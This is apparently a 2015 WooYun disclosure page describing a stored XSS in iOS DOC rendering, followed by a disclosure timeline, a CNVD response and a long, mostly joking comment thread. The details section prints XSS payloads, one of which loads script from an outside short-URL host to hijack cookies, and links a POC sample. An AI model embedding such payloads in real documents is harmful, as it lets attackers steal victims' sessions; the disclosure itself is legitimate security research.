当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094791

漏洞标题:IOS全系统某处储存xss导致跨域命令执行(QQ、微信、浏览器、邮箱等中枪)

相关厂商:ios

漏洞作者: mango

提交时间:2015-01-30 20:54

修复时间:2015-05-05 11:38

公开时间:2015-05-05 11:38

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-30: 细节已通知厂商并且等待厂商处理中
2015-02-04: 厂商已经确认,细节仅向厂商公开
2015-02-07: 细节向第三方安全合作伙伴开放
2015-03-31: 细节向核心白帽子及相关领域专家公开
2015-04-10: 细节向普通白帽子公开
2015-04-20: 细节向实习白帽子公开
2015-05-05: 细节向公众公开

简要描述:


最后一次编辑,经过测试发现早在很久以前ios版本就存在了,可能存有很多年了,可以做到跨域命令执,可获取任意用户浏览网站cookie,危害非常大。
尖刀收小伙伴了~~
想了很久,还是提交乌云了,乌云曾经也是我学习的地方,是乌云让我成长,所以我认为不管怎样,人总要落叶归根的~ 滴水之恩应当涌泉相报~~~么么哒乌云~

详细说明:

一、详细说明:
在IOS 系统中 都默认可以打开DOC文件 包括QQ 微信 浏览器等等
那么我们需要构造一个含有xss的文档
如图
在DOC文档中插入 特殊字符code

}</style><script>alert(/xss/)</


然后保存 发送给好友 或者微信好友 打开就会被xss

@)_2)ZGKU8TL1I0KU)1YIBH.png


08B02CA66EBEE0E9A93A02B3087187E1.png


68D6897D104C403B48F40798BBF0A7DF.png


Z9H9M)[6@I8PGZUEL~4QV07.jpg


构造短地址(短地址首页改为xss)

}</style><script src=http://18.gy>


7_U8X7{0M%DO93FTGB4ED5K.png


我们打开构造好POC 我们可以选择插入邮件系统发送给受害者 受害者打开后如下

6E7B3D90505286B56331DB7CC319249D.png


所以可以跨域劫持用户cookie 包括命令执行等

漏洞证明:

IMG_0452.PNG


POC样本 http://yunpan.cn/cKYGNhw5N9s2T (提取码:6b5d)
特别感谢 0x_Jin 是他的漏洞给了我一些帮助和一些跟好的思维方式~~再次感谢。

修复方案:

版权声明:转载请注明来源 mango@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-02-04 11:36

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-30 20:55 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    - -名字 也不改一下么~~

  2. 2015-01-30 20:55 | 鬼五 ( 普通白帽子 | Rank:214 漏洞数:83 )

    卧槽沙发

  3. 2015-01-30 20:56 | 鬼五 ( 普通白帽子 | Rank:214 漏洞数:83 )

    卧槽板凳

  4. 2015-01-30 20:56 | 鬼五 ( 普通白帽子 | Rank:214 漏洞数:83 )

    卧槽椅子

  5. 2015-01-30 20:56 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    前排先围观,这个应该叫:IOS某应用远程代码执行

  6. 2015-01-30 20:56 | 鬼五 ( 普通白帽子 | Rank:214 漏洞数:83 )

    卧槽还是我,好激动好激动

  7. 2015-01-30 20:57 | 鬼五 ( 普通白帽子 | Rank:214 漏洞数:83 )

    卧槽竟然不是,没刷新过来

  8. 2015-01-30 20:57 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)

    审核大大给个响亮名字~~

  9. 2015-01-30 20:59 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    - -、、、、改名字~~~~改名字~~~

  10. 2015-01-30 21:01 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    谢谢!

  11. 2015-01-30 21:02 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    这标题取得好亮........... 我很好奇是哪个同学审核的

  12. 2015-01-30 21:02 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @xsser 改下名字嘛~~~

  13. 2015-01-30 21:03 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @zeracker 我也好奇!!

  14. 2015-01-30 21:10 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    真响亮!

  15. 2015-01-30 21:14 | 残废 ( 普通白帽子 | Rank:179 漏洞数:40 | 我是残废,啦啦啦啦)

    mango牛掉渣天

  16. 2015-01-30 21:15 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @残废 - - 19字符xss 你还没给我!!

  17. 2015-01-30 21:16 | Anymous ( 普通白帽子 | Rank:124 漏洞数:28 )

    好。。名字好响亮。

  18. 2015-01-30 21:21 | 残废 ( 普通白帽子 | Rank:179 漏洞数:40 | 我是残废,啦啦啦啦)

    @mango 我日 我现在发给你

  19. 2015-01-30 21:25 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    卧槽,围观

  20. 2015-01-30 21:27 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    芒果大神求带装逼!

  21. 2015-01-30 21:42 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    我是来等cctv的

  22. 2015-01-30 21:47 | 海绵宝宝 ( 普通白帽子 | Rank:243 漏洞数:50 | 唯有梦想与好姑娘不可辜负.)

    相关厂商应是apple啊

  23. 2015-01-30 21:48 | 蛇精病 ( 路人 | Rank:23 漏洞数:10 | 你连棒棒糖都没有,还谈什么狗屁爱情?)

    我是来等cctv的

  24. 2015-01-30 21:53 | 南宁网警Mx ( 路人 | Rank:8 漏洞数:5 | 我是独行侠。有心交友qq1552673833)

    以往的经验cctv不会看讨论的

  25. 2015-01-30 21:56 | ‫‌ ( 实习白帽子 | Rank:76 漏洞数:14 )

    小伙伴又任性了,我只关心,明天媒体怎么看?

  26. 2015-01-30 21:57 | 第四维度 ( 实习白帽子 | Rank:58 漏洞数:34 | 谦谦君子,温润如玉)

    66666666666

  27. 2015-01-30 22:01 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    我想知道是全版本吗?

  28. 2015-01-30 22:04 | 南宁网警Mx ( 路人 | Rank:8 漏洞数:5 | 我是独行侠。有心交友qq1552673833)

    25楼的ID呢-.-

  29. 2015-01-30 22:05 | ‫‌ ( 实习白帽子 | Rank:76 漏洞数:14 )

    @南宁网警Mx 人若无名,便可专心练“贱”。

  30. 2015-01-30 22:06 | 南宁网警Mx ( 路人 | Rank:8 漏洞数:5 | 我是独行侠。有心交友qq1552673833)

    膜拜无名

  31. 2015-01-30 22:12 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    卧槽。坏人

  32. 2015-01-30 22:36 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @scanf 全版本!而且存在有好多年了

  33. 2015-01-30 22:58 | h4ckhell00 ( 路人 | Rank:10 漏洞数:2 | 最温暖的两个字是什么?1、我在。2、别怕。...)

    膜拜无名 以往的经验cctv不会看讨论的

  34. 2015-01-30 23:13 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @mango 不会又是蓝牙处吧。。,

  35. 2015-01-30 23:21 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @黑暗游侠 苹果又不傻 那么明显 怎么可能

  36. 2015-01-30 23:37 | 小火苗 ( 路人 | Rank:6 漏洞数:1 | 我是一只小火苗呀,春风吹又生呀...)

    都开始挖iOS了,牛逼

  37. 2015-01-30 23:40 | 南宁网警Mx ( 路人 | Rank:8 漏洞数:5 | 我是独行侠。有心交友qq1552673833)

    大安卓在哪里

  38. 2015-01-30 23:57 | chopper ( 普通白帽子 | Rank:144 漏洞数:29 | 菜鸟求学,多多关照~)

    高中生大黑阔

  39. 2015-01-30 23:58 | Chu ( 实习白帽子 | Rank:64 漏洞数:9 | 学习ing。)

    来点赞

  40. 2015-01-31 01:16 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    利用起来很简单 危害很大

  41. 2015-01-31 01:39 | Chu ( 实习白帽子 | Rank:64 漏洞数:9 | 学习ing。)

    @mango App 还是os 自身?

  42. 2015-01-31 06:59 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    ios几??7 还是8?

  43. 2015-01-31 08:03 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    这碉堡了

  44. 2015-01-31 09:20 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @Chu ios自身

  45. 2015-01-31 09:22 | 腹黑 ( 路人 | Rank:14 漏洞数:10 | (◦ "̮ ◦))

    题目太赞~

  46. 2015-01-31 09:25 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    上来,就看到响亮的大嘴巴子抽到苹果~~~~

  47. 2015-01-31 09:38 | 剁刀 ( 路人 | Rank:3 漏洞数:1 | 做一名安静的剁刀师)

    赶快公布吧,反正最后都是要忽略的

  48. 2015-01-31 09:48 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    卧槽要火!!!

  49. 2015-01-31 09:55 | xyang ( 普通白帽子 | Rank:242 漏洞数:51 | stay hungry stay foolish)

    记者拍这里

  50. 2015-01-31 10:14 | 机器猫 ( 普通白帽子 | Rank:1141 漏洞数:253 | 爱生活、爱腾讯、爱网络!)

    卧槽要火!!!

  51. 2015-01-31 10:26 | 一碗菊花茶 ( 路人 | Rank:20 漏洞数:5 | ,,,。。。,,。。。。,,,。。)

    CCTV拍这里吧。我都没上过电视呢。

  52. 2015-01-31 10:27 | RainShine ( 路人 | Rank:2 漏洞数:4 )

    卧槽!!!!!!!!CCAV快来看这里!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

  53. 2015-01-31 10:55 | 腹黑 ( 路人 | Rank:14 漏洞数:10 | (◦ "̮ ◦))

    卧槽!!!!!!!!CCAV快来看这里!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

  54. 2015-01-31 11:07 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    20W啊

  55. 2015-01-31 11:08 | jeffreys125 ( 实习白帽子 | Rank:63 漏洞数:14 | 懒人。。)

    ccav看这里

  56. 2015-01-31 11:09 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    雷了

  57. 2015-01-31 11:32 | 蜉蝣 ( 实习白帽子 | Rank:93 漏洞数:24 )

    已经复现出漏洞,记者快来拍

  58. 2015-01-31 11:49 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    收下我吧~

  59. 2015-01-31 11:58 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    你是来打卡的么,激活成功

  60. 2015-01-31 12:22 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @浩天 ~~~~- - 还不改标题。。。 我都编辑漏洞好多回了

  61. 2015-01-31 19:13 | 残雪 ( 实习白帽子 | Rank:34 漏洞数:7 | 屌丝一枚擅长扯淡)

    卧槽!!!!!!!!CCAV快来看这里!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

  62. 2015-02-02 15:53 | 剁刀 ( 路人 | Rank:3 漏洞数:1 | 做一名安静的剁刀师)

    @mango 是主动触发还是被动触发呢?

  63. 2015-02-02 16:33 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @剁刀 需要点击

  64. 2015-02-02 16:53 | 剁刀 ( 路人 | Rank:3 漏洞数:1 | 做一名安静的剁刀师)

    @mango 明白了,看来需要构造一个页面,让用户点击。还是非常麻烦啊

  65. 2015-02-03 12:46 | evil ( 实习白帽子 | Rank:41 漏洞数:21 )

    make

  66. 2015-02-04 12:07 | Dusk ( 路人 | Rank:1 漏洞数:1 | 小白 大牛别打我。。!)

    CCTV在哪 在哪。

  67. 2015-02-06 01:25 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  68. 2015-03-30 17:25 | ModNar ( 路人 | Rank:29 漏洞数:3 | 路人甲)

    payload怎么构造?js能拿到当前域的cookie么,感觉是先下载到本地后打开合为一步的情况

  69. 2015-05-05 12:40 | sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)

    苹果的漏洞也跟cnvd说 ?

  70. 2015-05-05 12:43 | 圣路西法 ( 路人 | Rank:4 漏洞数:3 | 围观大神ส็็็็็็ ̷̸̨̀͒̏̃ͦ...)

    make

  71. 2015-05-05 13:30 | 平凡之路24 ( 普通白帽子 | Rank:165 漏洞数:17 )

    mark下。~

  72. 2015-05-05 13:52 | 大漠長河 ( 实习白帽子 | Rank:43 漏洞数:7 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区欢迎您...)

    IOS....佩服,这漏洞值三个美刀

  73. 2015-05-05 19:31 | 奶权 ( 实习白帽子 | Rank:52 漏洞数:11 | 资深小白)

    擦。。一不小心点了购买测试代码= =

  74. 2015-05-05 23:07 | 屠龙宝刀点击就送 ( 路人 | Rank:4 漏洞数:2 | 简要介绍不能为空)

    CCTV看这里!!!

  75. 2015-05-06 17:35 | 盛大网络(乌云厂商)

    你这个是抄袭的这个吗 WooYun: 163邮箱存储型XSS 可劫持他人账号进入对方邮箱

  76. 2015-05-06 18:22 | hh2014 ( 普通白帽子 | Rank:225 漏洞数:39 | 继续)

    @盛大网络 我是来看盛大网络的

  77. 2015-07-04 16:22 | pyHackers ( 路人 | Rank:15 漏洞数:1 | 专注智能设备!)

    抄袭的也好意思来炫?